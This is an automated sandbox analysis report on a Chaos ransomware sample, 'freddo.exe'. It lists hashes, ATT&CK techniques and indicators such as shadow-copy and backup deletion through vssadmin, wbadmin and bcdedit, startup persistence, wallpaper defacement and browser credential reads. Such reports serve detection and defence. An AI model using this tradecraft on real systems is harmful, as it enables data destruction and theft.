chaos | a78d6caa0a4b98ca054410bc97416093e9ed3746215f621d67c1b6da93c58427

Analysis

max time kernel
789s
max time network
1184s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
10-04-2024 17:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

freddo.exe
Size

14.3MB
MD5

54624a787c53efc6b2b2f0adb02303c3
SHA1

f9ac2cb0fab7d6024a5e9e078edede8e1bb8848c
SHA256

a78d6caa0a4b98ca054410bc97416093e9ed3746215f621d67c1b6da93c58427
SHA512

987e73b269889c2668bb626edbef4dfeb589b36361b58f8f983a08bcd2120656fd1b85b33f92fb6ae86878b2c7d60eef945d1c0ca274f7740ce56f5e77882ed6
SSDEEP

393216:YHFuDKw9va/tx9L+zn7DJTa1TsUS4uPVJGbahsWPJ2i:YHFuDKw9vUtvQn7DJT0sU7u9c5EJ2i

Score

10^/10

chaos evasion ransomware spyware stealer

Malware Config

Signatures

Chaos
Ransomware family first seen in June 2021.
ransomware chaos

Chaos Ransomware 3 IoCs

resource	yara_rule
behavioral1/files/0x000200000002a8bb-667.dat	family_chaos
behavioral1/memory/5468-731-0x0000000000DB0000-0x0000000000DC4000-memory.dmp	family_chaos
behavioral1/files/0x000300000002a90d-845.dat	family_chaos

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
5164	bcdedit.exe
6336	bcdedit.exe

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
5232	wbadmin.exe

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\freddo.url	freddo.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	freddo.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\darkestpedo.txt	freddo.exe

Executes dropped EXE 2 IoCs

pid	Process
5980	freddo.exe
1028	Virus Maker.exe

Loads dropped DLL 6 IoCs

pid	Process
2844	freddo.exe
2844	freddo.exe
2844	freddo.exe
2844	freddo.exe
2844	freddo.exe
2844	freddo.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Drops desktop.ini file(s) 34 IoCs

description	ioc	Process
File opened for modification	C:\Users\Public\Documents\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	freddo.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-3852399462-405385529-394778097-1000\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	freddo.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini	freddo.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	freddo.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	freddo.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	freddo.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	freddo.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ryieslusy.jpg"	freddo.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
6288	vssadmin.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000_Classes\Local Settings	freddo.exe
Key created	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000_Classes\Local Settings	7zFM.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3852399462-405385529-394778097-1000\{576C6F19-E841-49B0-BB3B-443F69377982}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

pid	Process
7708	reg.exe
8468	reg.exe
7156	reg.exe
7564	reg.exe
7828	reg.exe
5876	reg.exe
5844	reg.exe
7624	reg.exe
8448	reg.exe
8752	reg.exe
7504	reg.exe
4476	reg.exe
5280	reg.exe
1260	reg.exe
8460	reg.exe
7436	reg.exe
9040	reg.exe
4032	reg.exe
7872	reg.exe
3348	reg.exe
7632	reg.exe
5844	reg.exe
5760	reg.exe
708	reg.exe
7836	reg.exe
3588	reg.exe
7872	reg.exe
296	reg.exe
6388	reg.exe
9196	reg.exe
4440	reg.exe
8704	reg.exe
1972	reg.exe
5740	reg.exe
6040	reg.exe
6248	reg.exe
8292	reg.exe
3656	reg.exe
6616	reg.exe
1780	reg.exe
6768	reg.exe
7448	reg.exe
6552	reg.exe
7500	reg.exe
6048	reg.exe
7804	reg.exe
8668	reg.exe
7488	reg.exe
6764	reg.exe
1856	reg.exe
7532	reg.exe
8716	reg.exe
8464	reg.exe
6520	reg.exe
3688	reg.exe
7368	reg.exe
9008	reg.exe
4440	reg.exe
4996	reg.exe
1536	reg.exe
4664	reg.exe
8688	reg.exe
7220	reg.exe
1652	reg.exe

NTFS ADS 8 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Virus Maker.rar:Zone.Identifier	msedge.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zO8378CB11\Virus Maker.exe:Zone.Identifier	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zO837302B1\readme.txt:Zone.Identifier	7zFM.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zO83706981\Virus Maker.exe:Zone.Identifier	7zFM.exe
File opened for modification	C:\Users\Admin\Downloads\freddo.exe.zip:Zone.Identifier	msedge.exe
File created	C:\Users\Admin\AppData\Roaming\freddo.exe\:Zone.Identifier:$DATA	freddo.exe
File opened for modification	C:\Users\Admin\Downloads\cat-blue-eyes.jpg:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\patreon.png:Zone.Identifier	msedge.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
7744	NOTEPAD.EXE
4636	NOTEPAD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
5980	freddo.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
232	msedge.exe
232	msedge.exe
2232	msedge.exe
2232	msedge.exe
2992	msedge.exe
2992	msedge.exe
4108	msedge.exe
4108	msedge.exe
2512	msedge.exe
2512	msedge.exe
4476	identity_helper.exe
4476	identity_helper.exe
3492	msedge.exe
3492	msedge.exe
5716	msedge.exe
5716	msedge.exe
5716	msedge.exe
5716	msedge.exe
6504	msedge.exe
6504	msedge.exe
5468	freddo.exe
5468	freddo.exe
5468	freddo.exe
5468	freddo.exe
5468	freddo.exe
5468	freddo.exe
5468	freddo.exe
5468	freddo.exe
5468	freddo.exe
5468	freddo.exe
5468	freddo.exe
5468	freddo.exe
5468	freddo.exe
5468	freddo.exe
5468	freddo.exe
5468	freddo.exe
5468	freddo.exe
5468	freddo.exe
5468	freddo.exe
5468	freddo.exe
6996	freddo.exe
6996	freddo.exe
6996	freddo.exe
6996	freddo.exe
6996	freddo.exe
6996	freddo.exe
6996	freddo.exe
6996	freddo.exe
6996	freddo.exe
6996	freddo.exe
6996	freddo.exe
6996	freddo.exe
6996	freddo.exe
6996	freddo.exe
6996	freddo.exe
6996	freddo.exe
6996	freddo.exe
6996	freddo.exe
6076	freddo.exe
6076	freddo.exe
6076	freddo.exe
6076	freddo.exe
6076	freddo.exe
6076	freddo.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
2844	freddo.exe
5944	7zFM.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: 33	5108	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	5108	AUDIODG.EXE
Token: SeDebugPrivilege	5468	freddo.exe
Token: SeDebugPrivilege	6996	freddo.exe
Token: SeDebugPrivilege	6076	freddo.exe
Token: SeDebugPrivilege	5980	freddo.exe
Token: SeBackupPrivilege	4316	vssvc.exe
Token: SeRestorePrivilege	4316	vssvc.exe
Token: SeAuditPrivilege	4316	vssvc.exe
Token: SeIncreaseQuotaPrivilege	504	WMIC.exe
Token: SeSecurityPrivilege	504	WMIC.exe
Token: SeTakeOwnershipPrivilege	504	WMIC.exe
Token: SeLoadDriverPrivilege	504	WMIC.exe
Token: SeSystemProfilePrivilege	504	WMIC.exe
Token: SeSystemtimePrivilege	504	WMIC.exe
Token: SeProfSingleProcessPrivilege	504	WMIC.exe
Token: SeIncBasePriorityPrivilege	504	WMIC.exe
Token: SeCreatePagefilePrivilege	504	WMIC.exe
Token: SeBackupPrivilege	504	WMIC.exe
Token: SeRestorePrivilege	504	WMIC.exe
Token: SeShutdownPrivilege	504	WMIC.exe
Token: SeDebugPrivilege	504	WMIC.exe
Token: SeSystemEnvironmentPrivilege	504	WMIC.exe
Token: SeRemoteShutdownPrivilege	504	WMIC.exe
Token: SeUndockPrivilege	504	WMIC.exe
Token: SeManageVolumePrivilege	504	WMIC.exe
Token: 33	504	WMIC.exe
Token: 34	504	WMIC.exe
Token: 35	504	WMIC.exe
Token: 36	504	WMIC.exe
Token: SeIncreaseQuotaPrivilege	504	WMIC.exe
Token: SeSecurityPrivilege	504	WMIC.exe
Token: SeTakeOwnershipPrivilege	504	WMIC.exe
Token: SeLoadDriverPrivilege	504	WMIC.exe
Token: SeSystemProfilePrivilege	504	WMIC.exe
Token: SeSystemtimePrivilege	504	WMIC.exe
Token: SeProfSingleProcessPrivilege	504	WMIC.exe
Token: SeIncBasePriorityPrivilege	504	WMIC.exe
Token: SeCreatePagefilePrivilege	504	WMIC.exe
Token: SeBackupPrivilege	504	WMIC.exe
Token: SeRestorePrivilege	504	WMIC.exe
Token: SeShutdownPrivilege	504	WMIC.exe
Token: SeDebugPrivilege	504	WMIC.exe
Token: SeSystemEnvironmentPrivilege	504	WMIC.exe
Token: SeRemoteShutdownPrivilege	504	WMIC.exe
Token: SeUndockPrivilege	504	WMIC.exe
Token: SeManageVolumePrivilege	504	WMIC.exe
Token: 33	504	WMIC.exe
Token: 34	504	WMIC.exe
Token: 35	504	WMIC.exe
Token: 36	504	WMIC.exe
Token: SeBackupPrivilege	5708	wbengine.exe
Token: SeRestorePrivilege	5708	wbengine.exe
Token: SeSecurityPrivilege	5708	wbengine.exe
Token: 33	4264	msedge.exe
Token: SeIncBasePriorityPrivilege	4264	msedge.exe
Token: 33	4264	msedge.exe
Token: SeIncBasePriorityPrivilege	4264	msedge.exe
Token: 33	4264	msedge.exe
Token: SeIncBasePriorityPrivilege	4264	msedge.exe
Token: 33	4264	msedge.exe
Token: SeIncBasePriorityPrivilege	4264	msedge.exe
Token: 33	4264	msedge.exe
Token: SeIncBasePriorityPrivilege	4264	msedge.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe

Suspicious use of SendNotifyMessage 26 IoCs

pid	Process
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2844	freddo.exe
2516	MiniSearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2992 wrote to memory of 920	2992	msedge.exe	103
PID 2992 wrote to memory of 920	2992	msedge.exe	103
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4156	2992	msedge.exe	105
PID 2992 wrote to memory of 4108	2992	msedge.exe	107
PID 2992 wrote to memory of 4108	2992	msedge.exe	107
PID 2992 wrote to memory of 2188	2992	msedge.exe	108
PID 2992 wrote to memory of 2188	2992	msedge.exe	108
PID 2992 wrote to memory of 2188	2992	msedge.exe	108
PID 2992 wrote to memory of 2188	2992	msedge.exe	108
PID 2992 wrote to memory of 2188	2992	msedge.exe	108
PID 2992 wrote to memory of 2188	2992	msedge.exe	108
PID 2992 wrote to memory of 2188	2992	msedge.exe	108
PID 2992 wrote to memory of 2188	2992	msedge.exe	108
PID 2992 wrote to memory of 2188	2992	msedge.exe	108
PID 2992 wrote to memory of 2188	2992	msedge.exe	108
PID 2992 wrote to memory of 2188	2992	msedge.exe	108
PID 2992 wrote to memory of 2188	2992	msedge.exe	108
PID 2992 wrote to memory of 2188	2992	msedge.exe	108
PID 2992 wrote to memory of 2188	2992	msedge.exe	108
PID 2992 wrote to memory of 2188	2992	msedge.exe	108
PID 2992 wrote to memory of 2188	2992	msedge.exe	108
PID 2992 wrote to memory of 2188	2992	msedge.exe	108
PID 2992 wrote to memory of 2188	2992	msedge.exe	108
PID 2992 wrote to memory of 2188	2992	msedge.exe	108
PID 2992 wrote to memory of 2188	2992	msedge.exe	108

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\freddo.exe
"C:\Users\Admin\AppData\Local\Temp\freddo.exe"
1⤵
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2844

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffeeb343cb8,0x7ffeeb343cc8,0x7ffeeb343cd8
1⤵
PID:2212

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,14155298364141026844,12852892177202944029,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1908 /prefetch:2
1⤵
PID:1648

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1888,14155298364141026844,12852892177202944029,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:232

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1888,14155298364141026844,12852892177202944029,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8
1⤵
PID:4016

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2400

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,14155298364141026844,12852892177202944029,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
1⤵
PID:4616

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,14155298364141026844,12852892177202944029,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
1⤵
PID:2196

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2128

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,14155298364141026844,12852892177202944029,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4388 /prefetch:1
1⤵
PID:2784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,14155298364141026844,12852892177202944029,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4536 /prefetch:1
1⤵
PID:2640

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,14155298364141026844,12852892177202944029,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4868 /prefetch:1
1⤵
PID:5032

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,14155298364141026844,12852892177202944029,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1
1⤵
PID:3364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,14155298364141026844,12852892177202944029,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4396 /prefetch:1
1⤵
PID:4312

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1888,14155298364141026844,12852892177202944029,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4948 /prefetch:8
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2232

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1888,14155298364141026844,12852892177202944029,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8
1⤵
PID:4908

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
